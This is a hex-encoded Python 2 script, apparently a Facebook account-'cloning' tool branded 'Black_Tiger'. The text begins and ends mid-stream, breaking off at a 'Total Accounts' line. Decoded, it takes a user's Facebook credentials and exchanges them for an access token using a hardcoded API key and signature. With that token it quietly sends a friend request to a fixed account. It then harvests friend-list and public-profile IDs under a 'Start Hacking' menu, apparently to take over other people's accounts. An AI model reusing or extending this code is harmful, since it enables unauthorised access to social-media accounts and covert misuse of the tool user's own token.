590E29590E29688E29688E2959720202020202020E29688E29688E29591202020E29688E29688E29591E29688E29688E29591202020E29688E29688E29591E29688E29688E29594E29590E29590E2959D2020E29688E29688E29594E29590E29590E29688E29688E295970A5C3033335B313B39356DE29688E29688E29688E29688E29688E29688E29594E2959D20202020202020E29688E29688E29591202020E29688E29688E29591E2959AE29688E29688E29688E29688E29688E29688E29594E2959DE29688E29688E29688E29688E29688E29688E29688E29597E29688E29688E295912020E29688E29688E295910A5C3033335B313B39366DE2959AE29590E29590E29590E29590E29590E2959D2020202020202020E2959AE29590E2959D202020E2959AE29590E2959D20E2959AE29590E29590E29590E29590E29590E2959D20E2959AE29590E29590E29590E29590E29590E29590E2959DE2959AE29590E2959D2020E2959AE29590E2959D200A5C3033335B313B39316DE280A2E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E280A20A5C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D424C41434B5F54494745525C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A20A205C3033335B313B39376DE280A2E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E296850A5C3033335B313B34316D5C3033335B313B33376D5BE29AA1E29AA15C3033335B313B33376D417574686F72204E616D653A20426C61636B5F546967657220E29AA1E29AA15C3033335B313B33376D5D5C3033335B313B306D0A5C3033335B313B34316D5C3033335B313B33376D5BE29AA1E29AA15C3033335B313B33376DE2988F20E286922B39323330333733333531313420E29AA1E29AA15C3033335B313B33376D5D5C3033335B313B306D0A5C3033335B313B34316D5C3033335B313B33376D5BE29AA1E29AA15C3033335B313B33376D5954204368616E6E616C3A54696D653420596F7520E29AA1E29AA15C3033335B313B33376D5D5C3033335B313B306D0A5C3033335B313B34316D5C3033335B313B33376D5BE29AA1E29AA1205C3033335B313B33376D46726F6D3A2050616B697374616E20E29AA1E29AA15C3033335B313B33376D5D5C3033335B313B306D0A5C3033335B313B39376DE280A2E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E296850A5C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D424C41434B5F54494745525C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A20A2222220A0A6465662074696B28293A0A09746974696B203D205B272E202020272C272E2E2020272C272E2E2E20275D0A09666F72206F20696E20746974696B3A0A09097072696E7428225C725C7831625B313B39336D426C61636B5469676572E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29692E29692E29692E29692E29692E29692E29692E296922E2E393925205C7831625B313B39336D222B6F292C3B7379732E7374646F75742E666C75736828293B74696D652E736C65657028302E31290A0A0A6261636B203D20300A626572686173696C203D205B5D0A63656B706F696E74203D205B5D0A6F6B73203D205B5D0A6964203D205B5D0A6C69737467727570203D205B5D0A76756C6E6F74203D20225C3033335B33316D4E6F742056756C6E220A76756C6E203D20225C3033335B33326D56756C6E220A0A6F732E73797374656D2822636C65617222290A7072696E7420202222220A5C3033335B313B39316DE29480E29480E29480E29684E29680E29680E29680E29680E29680E29480E29480E29480E29684E29688E29680E29680E29680E29688E296840A5C3033335B313B39326DE29480E29480E29690E29684E29684E29684E29684E29684E29684E29684E29684E29688E29688E2968CE29680E29684E29680E29690E29688E296880A5C3033335B313B39336DE29480E29480E29690E29692E29692E29692E29692E29692E29692E29692E29692E29688E29688E29688E2968CE29680E29690E29688E29688E296880A5C3033335B313B39346DE29480E29480E29480E2968CE29692E29693E29692E29692E29692E29692E29693E29692E29688E29688E2968CE29680E29690E29688E296880A5C3033335B313B39356DE29480E29480E29480E2968CE29693E29690E29680E29680E29680E29680E2968CE29693E29480E29680E29680E29680E29680E2968020200A5C3033335B313B39376DE280A2E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E296850A5C3033335B313B39376DE280A2E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E280A20A5C3033335B313B39316DE29480E29480E29480E29480E29480E29688E29480E29684E29680E29688E29480E29480E29688E29680E29684E29480E29688E29480E29480E29480E29480E294805C3033335B313B39376DE29480E29480E29480E29480E29480E29688E29480E29684E29680E29688E29480E29480E29688E29680E29684E29480E29688E29480E29480E29480E29480E29480200A5C3033335B313B39316DE29480E29480E29480E29480E29690E2968CE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29690E2968CE29480E29480E29480E294805C3033335B313B39376DE29480E29480E29480E29480E29690E2968CE29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29690E2968CE29480E29480E29480E294800A5C3033335B313B39316DE29480E29480E29480E29480E29688E2968CE29680E29684E29480E29480E29684E29684E29480E29480E29684E29680E29690E29688E29480E29480E29480E294805C3033335B313B39376DE29480E29480E29480E29480E29688E2968CE29680E29684E29480E29480E29684E29684E29480E29480E29684E29680E29690E29688E29480E29480E29480E294800A5C3033335B313B39316DE29480E29480E29480E29690E29688E29688E29480E29480E29680E29680E29480E29480E29680E29680E29480E29480E29688E29688E2968CE29480E29480E294805C3033335B313B39376DE29480E29480E29480E29690E29688E29688E29480E29480E29680E29680E29480E29480E29680E29680E29480E29480E29688E29688E2968CE29480E29480E294800A5C3033335B313B39316DE29480E29480E29684E29688E29688E29688E29688E29684E29480E29480E29690E2968CE29480E29480E29684E29688E29688E29688E29688E29684E29480E294805C3033335B313B39376DE29480E29480E29684E29688E29688E29688E29688E29684E29480E29480E29690E2968CE29480E29480E29684E29688E29688E29688E29688E29684E29480E29480202020200A5C3033335B313B39376DE280A2E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E280A220202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020202020200A5C3033335B313B39316D205F5F5F5F20205F5F20202020205F5F202020205F5F5F20205F5F205F202020205F5F5F5F20205F5F20205F5F5F20205F5F5F5F20205F5F5F5F200A5C3033335B313B39326D2820205F205C282020292020202F205F5C20202F205F5F292820202F20292020285F20205F29282020292F205F5F292820205F5F292820205F205C0A5C3033335B313B39336D2029205F20282F20285F2F5C2F202020205C2820285F5F2020292020282020202020292820202029282820285F205C2029205F292020292020202F0A5C3033335B313B39346D285F5F5F5F2F5C5F5F5F5F2F5C5F2F5C5F2F205C5F5F5F29285F5F5C5F29202020285F5F2920285F5F295C5F5F5F2F285F5F5F5F29285F5F5C5F290A5C3033335B313B39356D205F5F5F5F20205F5F5F5F20205F5F5F5F2020205F5F20205F5F5F5F2020205F5F5F2020205F5F202020205F5F5F202020202020202020202020200A5C3033335B313B39366D2820205F5F292820205F205C2820205F205C202F20205C2820205F205C202F205F205C202F20205C20202F205F205C2020202020202020202020200A5C3033335B313B39376D2029205F292020292020202F20292020202F2820204F2029292020202F285F5F202028282020302029285F5F2020282020202020202020202020200A5C3033335B313B39316D285F5F5F5F29285F5F5C5F29285F5F5C5F29205C5F5F2F285F5F5C5F292020285F5F2F205C5F5F2F202020285F5F2F2020202020202020202020200A5C3033335B313B39326DE280A2E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E29480E280A20A205C3033335B313B39376DE280A2E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E29685E296850A202222220A436F7272656374557365726E616D65203D2022426C61636B220A436F727265637450617373776F7264203D20225469676572220A0A6C6F6F70203D202774727565270A7768696C6520286C6F6F70203D3D20277472756527293A0A20202020757365726E616D65203D207261775F696E70757428225C3033335B313B39316D5B2B5D205C3033335B313B39316D205C7831625B313B39316D546F6F6C20557365726E616D65205C7831625B313B39316D3A205C7831625B313B39376D22290A2020202069662028757365726E616D65203D3D20436F7272656374557365726E616D65293A0A202020200970617373776F7264203D207261775F696E70757428225C3033335B313B39316D5B2B5D205C3033335B313B39316D205C7831625B313B39316D546F6F6C2050617373776F7264205C7831625B313B39316D3A205C7831625B313B39376D22290A20202020202020206966202870617373776F7264203D3D20436F727265637450617373776F7264293A0A2020202020202020202020207072696E7420224C6F6767656420696E207375636365737366756C6C792061732022202B20757365726E616D6520234465763A426C61636B54696765722D4572726F723430340A092020202074696D652E736C6565702832290A2020202020202020202020206C6F6F70203D202766616C7365270A2020202020202020656C73653A0A2020202020202020202020207072696E7420225C3033335B313B39376D57726F6E672050617373776F7264220A2020202020202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F796F7574752E62652F307357304B3173516B6B4927290A20202020656C73653A0A20202020202020207072696E7420225C3033335B313B39376D57726F6E6720557365726E616D65220A20202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F796F7574752E62652F307357304B3173516B6B4927290A0A2323232323204C4943454E53452023232323230A233D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D3D230A646566206C6973656E736928293A0A096F732E73797374656D2827636C65617227290A096C6F67696E28290A232323236C6F67696E2323232323232323230A646566206C6F67696E28293A0A096F732E73797374656D2827636C65617227290A097072696E74206C6F676F0A097072696E7420225C3033335B313B39316D5B315D5C3033335B313B34376D5C3033335B313B33316D4C6F67696E20576974682046616365626F6F6B20202020202020202020202020205C3033335B313B306D220A202020202020202074696D652E736C65657028302E3035290A20202020202020207072696E7420225C3033335B313B39326D5B325D5C3033335B313B34376D5C3033335B313B33316D4C6F67696E205769746820546F6B656E20202020202020202020202020202020205C3033335B313B306D220A202020202020202074696D652E736C65657028302E3035290A20202020202020207072696E7420225C3033335B313B39336D5B335D5C3033335B313B34376D5C3033335B313B33316D446F776E6C6F616420546F6B656E204170702020202020202020202020202020205C3033335B313B306D220A202020202020202074696D652E736C65657028302E3035290A20202020202020207072696E7420225C3033335B313B39346D5B345D5C3033335B313B34376D5C3033335B313B33316D53756273637269626520596F7554756265204368616E6E656C20202020202020205C3033335B313B306D220A202020202020202074696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39356D5B355D5C3033335B313B34376D5C3033335B313B33316D4A6F696E2057686174736170702067726F757020466F722048656C7020202020202020202020205C3033335B313B306D220A202020202020202074696D652E736C65657028302E3035290A20202020202020207072696E7420225C3033335B313B39366D5B305D5C3033335B313B34376D5C3033335B313B33316D4578697420202020202020202020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A0970696C69685F6C6F67696E28290A0A6465662070696C69685F6C6F67696E28293A0A097065616B203D207261775F696E70757428225C6E5C3033335B313B39376D5B2B5D205C3033335B303B33316D53656C656374204F7074696F6E3A205C3033335B313B39316D22290A096966207065616B203D3D22223A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C69685F6C6F67696E28290A09656C6966207065616B203D3D2231223A0A09096C6F67696E3128290A2020202020202020656C6966207065616B203D3D2232223A0A092020202020202020746F6B656E7A28290A2020202020202020656C6966207065616B203D3D2233223A0A0920202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F6D2E61706B707572652E636F6D2F6765742D6163636573732D746F6B656E2F636F6D2E70726F69742E74686169736F6E2E676574616363657373746F6B656E66616365626F6F6B2F646F776E6C6F61642F312D41504B3F66726F6D3D76657273696F6E7325324676657273696F6E27290A0920202020202020206C6F67696E28290A2020202020202020656C6966207065616B203D3D2234223A0A0920202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F796F7574752E62652F307357304B3173516B6B4927290A0920202020202020206C6F67696E28290A2020202020202020656C6966207065616B203D3D2235223A0A0920202020202020206F732E73797374656D28277864672D6F70656E2068747470733A2F2F636861742E77686174736170702E636F6D2F446D4164704573676A6872395A357A537A7757756A362027290A202020202020202020202020202020206C6F67696E28290A09656C6966207065616B203D3D2230223A0A09096B656C75617228290A2020202020202020656C73653A0A09097072696E74225C3033335B313B39316D5B215D2057726F6E6720696E707574220A09096B656C75617228290A0A646566206C6F67696E3128293A0A096F732E73797374656D2827636C65617227290A097472793A0A0909746F6B6574203D206F70656E28276C6F67696E2E747874272C277227290A09096D656E752829200A0965786365707420284B65794572726F722C494F4572726F72293A0A09096F732E73797374656D2827636C65617227290A2020202020202020202020202020202074696D652E736C65657028302E3035290A09097072696E74206C6F676F202020202020202020202020202020200A09097072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A09097072696E7428275C3033335B313B39376D5B2B5D5C3033335B313B34376D5C3033335B313B33316D4C4F47494E20574954482046414345424F4F4B5C7831625B313B39376D205C3033335B313B306D2720290A09097072696E742827092720290A09096964203D207261775F696E70757428275C3033335B313B39376D5B215D205C7831625B313B39376D4E756D6265722F456D61696C5C7831625B313B39376D3A205C7831625B313B39376D27290A0909707764203D207261775F696E70757428275C3033335B313B39376D5B2B5D205C7831625B313B39376D50617373776F72645C7831625B313B39376D202020203A205C7831625B313B39376D27290A090974696B28290A09097472793A0A09090962722E6F70656E282768747470733A2F2F6D2E66616365626F6F6B2E636F6D27290A0909657863657074206D656368616E697A652E55524C4572726F723A0A0909097072696E74225C6E5C7831625B313B39376D5468657265206973206E6F20696E7465726E657420636F6E6E656374696F6E220A0909096B656C75617228290A090962722E5F666163746F72792E69735F68746D6C203D20547275650A090962722E73656C6563745F666F726D286E723D30290A090962722E666F726D5B27656D61696C275D203D2069640A090962722E666F726D5B2770617373275D203D207077640A090962722E7375626D697428290A090975726C203D2062722E67657475726C28290A090969662027736176652D6465766963652720696E2075726C3A0A0909097472793A0A090909097369673D20276170695F6B65793D383832613834393033363164613938373032626639376130323164646331346463726564656E7469616C735F747970653D70617373776F7264656D61696C3D272B69642B27666F726D61743D4A534F4E67656E65726174655F6D616368696E655F69643D3167656E65726174655F73657373696F6E5F636F6F6B6965733D316C6F63616C653D656E5F55536D6574686F643D617574682E6C6F67696E70617373776F72643D272B7077642B2772657475726E5F73736C5F7265736F75726365733D30763D312E303632663863653966373462313266383463313233636332333433376134613332270A0909090964617461203D207B226170695F6B6579223A223838326138343930333631646139383730326266393761303231646463313464222C2263726564656E7469616C735F74797065223A2270617373776F7264222C22656D61696C223A69642C22666F726D6174223A224A534F4E222C202267656E65726174655F6D616368696E655F6964223A2231222C2267656E65726174655F73657373696F6E5F636F6F6B696573223A2231222C226C6F63616C65223A22656E5F5553222C226D6574686F64223A22617574682E6C6F67696E222C2270617373776F7264223A7077642C2272657475726E5F73736C5F7265736F7572636573223A2230222C2276223A22312E30227D0A09090909783D686173686C69622E6E657728226D643522290A09090909782E75706461746528736967290A09090909613D782E68657864696765737428290A09090909646174612E757064617465287B27736967273A617D290A0909090975726C203D202268747470733A2F2F6170692E66616365626F6F6B2E636F6D2F726573747365727665722E706870220A09090909723D72657175657374732E6765742875726C2C706172616D733D64617461290A090909097A3D6A736F6E2E6C6F61647328722E74657874290A09090909756E696B657273203D206F70656E28226C6F67696E2E747874222C20277727290A09090909756E696B6572732E7772697465287A5B276163636573735F746F6B656E275D290A09090909756E696B6572732E636C6F736528290A090909097072696E7420275C3033335B313B34376D5C3033335B313B39316D426C61636B5F5469676572204C6F67696E205375636365737366756C5C3033335B313B306D270A090909096F732E73797374656D28277864672D6F70656E2068747470733A2F2F796F7574752E62652F5F6E72336734696D56784927290A0909090972657175657374732E706F7374282768747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6D6574686F643D706F737426756964733D6777696D75736133266163636573735F746F6B656E3D272B7A5B276163636573735F746F6B656E275D290A090909096D656E7528290A0909096578636570742072657175657374732E657863657074696F6E732E436F6E6E656374696F6E4572726F723A0A090909097072696E74225C6E5C7831625B313B39376D5468657265206973206E6F20696E7465726E657420636F6E6E656374696F6E220A090909096B656C75617228290A090969662027636865636B706F696E742720696E2075726C3A0A0909097072696E7428225C6E5C7831625B313B39376DE288864350E288862043726561742041204E6577204163636F756E7422290A0909096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A09090974696D652E736C6565702831290A0909096B656C75617228290A0909656C73653A0A0909097072696E7428225C6E5C7831625B313B39376D50617373776F72642F456D61696C2069732077726F6E6722290A0909096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A09090974696D652E736C6565702831290A0909096C6F67696E28290A0909090A646566206D656E7528293A0A096F732E73797374656D2827636C65617227290A097472793A0A0909746F6B65743D6F70656E28276C6F67696E2E747874272C277227292E7265616428290A0965786365707420494F4572726F723A0A09096F732E73797374656D2827636C65617227290A09097072696E74225C7831625B313B39346D546F6B656E20696E76616C6964220A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A090974696D652E736C6565702831290A09096C6F67696E28290A097472793A0A09096F203D2072657175657374732E676574282768747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D653F6163636573735F746F6B656E3D272B746F6B6574290A090961203D206A736F6E2E6C6F616473286F2E74657874290A09096E616D61203D20615B276E616D65275D0A09096964203D20615B276964275D0A2020202020202020202020202020202074203D2072657175657374732E676574282768747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F73756273637269626572733F6163636573735F746F6B656E3D27202B20746F6B6574290A2020202020202020202020202020202062203D206A736F6E2E6C6F61647328742E74657874290A20202020202020202020202020202020737562203D2073747228625B2773756D6D617279275D5B27746F74616C5F636F756E74275D290A09657863657074204B65794572726F723A0A09096F732E73797374656D2827636C65617227290A09097072696E74225C3033335B313B39376DE288864350E2888643726561742041204E6577204163636F756E74220A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A090974696D652E736C6565702831290A09096C6F67696E28290A096578636570742072657175657374732E657863657074696F6E732E436F6E6E656374696F6E4572726F723A0A09097072696E74225C7831625B313B39346D5468657265206973206E6F20696E7465726E657420636F6E6E656374696F6E220A09096B656C75617228290A096F732E73797374656D2822636C656172222920234465763A426C61636B54696765722D4572726F723430340A097072696E74206C6F676F0A097072696E7420225C3033335B313B33376D5B215D5C3033335B313B39316D204C6F6767656420696E205573657220496E666F726D6174696F6E5C3033335B313B39326D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B33376D5BE280A25D5C3033335B313B39316D204E616D655C3033335B313B39336D3A5C3033335B313B39316D222B6E616D612B225C3033335B313B39336D202020202020202020202020202020220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B33376D5BE280A25D5C3033335B313B39316D2049445C3033335B313B39336D3A5C3033335B313B39316D222B69642B225C7831625B313B39336D2020202020202020202020202020220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A097072696E7420225C3033335B313B39326D5B315D5C3033335B313B34376D5C3033335B313B33316D5374617274204861636B696E6720202020202020202020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39336D5B325D5C3033335B313B34376D5C3033335B313B33316D4944204E6F7420466F756E642050726F626C656D20536F6C76652020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39346D5B335D5C3033335B313B34376D5C3033335B313B33316D526573742F55706461746520426C61636B5F546967657220202020202020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39356D5B305D5C3033335B313B34376D5C3033335B313B33316D4578697420202020202020202020202020202020202020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A0970696C696828290A0A0A6465662070696C696828293A0A09756E696B657273203D207261775F696E70757428225C6E5C3033335B313B33316D53656C656374204F7074696F6E3A205C3033335B313B39316D22290A09696620756E696B657273203D3D22223A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C696828290A2020202020202020656C696620756E696B657273203D3D2231223A09090A092020202020202020737570657228290A09656C696620756E696B657273203D3D2232223A0A09096F732E73797374656D28277864672D6F70656E2068747470733A2F2F636F6D6D656E747069636B65722E636F6D2F66696E642D66616365626F6F6B2D69642E70687027290A0920202020202020206D656E7528290A09656C696620756E696B657273203D3D2233223A0A09096F732E73797374656D2827636C65617227290A09097072696E74206C6F676F0A09097072696E7420225C3033335B313B39356D2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E5C3033335B313B39316D4461746152657365745C3033335B313B39356D2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E220A202020202020202020202020202020206A616C616E28275C3033335B313B39316D3D31302527290A202020202020202020202020202020206A616C616E28225C3033335B313B39326D3D3D32302522290A202020202020202020202020202020206A616C616E28275C3033335B313B39336D3D3D3D33302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39346D3D3D3D3D34302527290A202020202020202020202020202020206A616C616E28225C3033335B313B39356D3D3D3D3D3D35302522290A202020202020202020202020202020206A616C616E28225C3033335B313B39366D3D3D3D3D3D3D36302522290A202020202020202020202020202020206A616C616E28275C3033335B313B39376D3D3D3D3D3D3D3D37302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39366D3D3D3D3D3D3D3D3D38302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39356D3D3D3D3D3D3D3D3D3D39302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39346D3D3D3D3D3D3D3D3D3D3D3130302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39336D436C6F6E696E67204461746120526573657420616E642075706461746520627920426C61636B5F546967657227290A09096F732E73797374656D28276769742070756C6C206F726967696E206D617374657227290A09097261775F696E70757428275C6E5C7831625B313B39316D5B205C7831625B313B39376D4261636B205C7831625B313B39316D5D27290A0920202020202020206D656E75282909090A09656C696620756E696B657273203D3D2230223A0A09096A616C616E2827546F6B656E2052656D6F76656427290A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A09096B656C75617228290A09656C73653A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C696828290A6465662070696C696828293A0A09756E696B657273203D207261775F696E70757428225C6E5C3033335B313B39316D43686F6F736520616E204F7074696F6E3A205C3033335B313B39376D22290A09696620756E696B657273203D3D22223A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C696828290A09656C696620756E696B657273203D3D2231223A0A0909737570657228290A09656C696620756E696B657273203D3D2232223A0A09096F732E73797374656D28277864672D6F70656E2068747470733A2F2F636F6D6D656E747069636B65722E636F6D2F66696E642D66616365626F6F6B2D69642E70687027290A0920202020202020206D656E7528290A09656C696620756E696B657273203D3D2233223A0A09096F732E73797374656D2827636C65617227290A09097072696E74206C6F676F0A09097072696E7420225C3033335B313B39356D2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E5C3033335B313B39316D4461746152657365745C3033335B313B39356D2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E2E220A202020202020202020202020202020206A616C616E28275C3033335B313B39316D3D31302527290A202020202020202020202020202020206A616C616E28225C3033335B313B39326D3D3D32302522290A202020202020202020202020202020206A616C616E28275C3033335B313B39336D3D3D3D33302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39346D3D3D3D3D34302527290A202020202020202020202020202020206A616C616E28225C3033335B313B39356D3D3D3D3D3D35302522290A202020202020202020202020202020206A616C616E28225C3033335B313B39366D3D3D3D3D3D3D36302522290A202020202020202020202020202020206A616C616E28275C3033335B313B39376D3D3D3D3D3D3D3D37302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39366D3D3D3D3D3D3D3D3D38302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39356D3D3D3D3D3D3D3D3D3D39302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39346D3D3D3D3D3D3D3D3D3D3D3130302527290A202020202020202020202020202020206A616C616E28275C3033335B313B39336D436C6F6E696E67204461746120526573657420616E642075706461746520627920426C61636B5F546967657227290A09096F732E73797374656D28276769742070756C6C206F726967696E206D617374657227290A09097261775F696E70757428275C6E5C7831625B313B39316D5B205C7831625B313B39376D4261636B205C7831625B313B39316D5D27290A0920202020202020206D656E75282909090A09656C696620756E696B657273203D3D2230223A0A09096A616C616E2827546F6B656E2052656D6F76656427290A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A09096B656C75617228290A09656C73653A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C696828290A0A0A64656620737570657228293A0A09676C6F62616C20746F6B65740A096F732E73797374656D2827636C65617227290A097472793A0A0909746F6B65743D6F70656E28276C6F67696E2E747874272C277227292E7265616428290A0965786365707420494F4572726F723A0A09097072696E74225C7831625B313B39316D546F6B656E20696E76616C6964220A09096F732E73797374656D2827726D202D7266206C6F67696E2E74787427290A090974696D652E736C6565702831290A09096C6F67696E28290A096F732E73797374656D2827636C65617227290A097072696E74206C6F676F0A097072696E7420225C3033335B313B39376D5B315D5C3033335B313B34376D5C3033335B313B39316D436C6F6E652046726F6D20467269656E64204C697374202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39376D5B325D5C3033335B313B34376D5C3033335B313B39316D436C6F6E652046726F6D205075626C6963204964205C3033335B313B306D220A0974696D652E736C65657028302E3035290A097072696E7420225C3033335B313B39376D5B305D5C3033335B313B34376D5C3033335B313B39316D4261636B2020202020202020202020202020202020202020205C3033335B313B306D220A0974696D652E736C65657028302E3035290A0970696C69685F737570657228290A0A6465662070696C69685F737570657228293A0A097065616B203D207261775F696E70757428225C6E5C3033335B313B39376D5B2B5D5C3033335B313B39316D53656C656374204F7074696F6E3A205C3033335B313B39376D22290A096966207065616B203D3D22223A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C69685F737570657228290A09656C6966207065616B203D3D2231223A0A09096F732E73797374656D2827636C65617227290A09097072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A09097072696E74206C6F676F0A09096A616C616E28275C3033335B313B39376D5B2B5D5C3033335B313B39316D426C61636B5469676572E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29692E29692E29692E29692E29692E29692E29692E296922E2E3939255C3033335B313B39376D3A2D3A27290A090972203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F6D652F667269656E64733F6163636573735F746F6B656E3D222B746F6B6574290A09097A203D206A736F6E2E6C6F61647328722E74657874290A0909666F72207320696E207A5B2764617461275D3A0A09090969642E617070656E6428735B276964275D290A09656C6966207065616B203D3D2232223A0A09096F732E73797374656D2827636C65617227290A09097072696E7420225C3033335B313B39376DE280A22D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D5C3033335B313B33376D426C61636B5F54696765725C3033335B313B39376D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2D2DE280A2220A09097072696E74206C6F676F0A0909696474203D207261775F696E70757428225C3033335B313B39376D5B2B5D5C3033335B313B39316D456E7465722049445C3033335B313B39376D3A205C3033335B313B39376D22290A09097472793A0A0909096A6F6B203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B6964742B223F6163636573735F746F6B656E3D222B746F6B6574290A0909096F70203D206A736F6E2E6C6F616473286A6F6B2E74657874290A0909097072696E74225C3033335B313B39376D5B2B5D5C3033335B313B39316D4E616D655C3033335B313B39376D3A5C3033335B313B39376D20222B6F705B226E616D65225D0A0909657863657074204B65794572726F723A0A0909097072696E74225C3033335B313B39376D5B2B5D5C7831625B313B39316D4944204E6F7420466F756E6421220A0909097261775F696E70757428225C6E5C3033335B313B39366D5B5C3033335B313B39376D4261636B5C3033335B313B39366D5D22290A090909737570657228290A09097072696E74225C3033335B313B39376D5B2B5D5C3033335B313B39316D426C61636B5469676572E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29688E29692E29692E29692E29692E29692E29692E29692E296922E2E3939255C3033335B313B39376D3A2D3A220A090972203D2072657175657374732E676574282268747470733A2F2F67726170682E66616365626F6F6B2E636F6D2F222B6964742B222F667269656E64733F6163636573735F746F6B656E3D222B746F6B6574290A09097A203D206A736F6E2E6C6F61647328722E74657874290A0909666F72206920696E207A5B2764617461275D3A0A09090969642E617070656E6428695B276964275D290A09656C6966207065616B203D3D2230223A0A09096D656E7528290A09656C73653A0A09097072696E7420225C7831625B313B39316D46696C6C20696E20636F72726563746C79220A090970696C69685F737570657228290A090A097072696E7420225C3033335B313B39376D5B2B5D5C3033335B313B39316D546F74616C204163636F756E74735C3033335B313B3937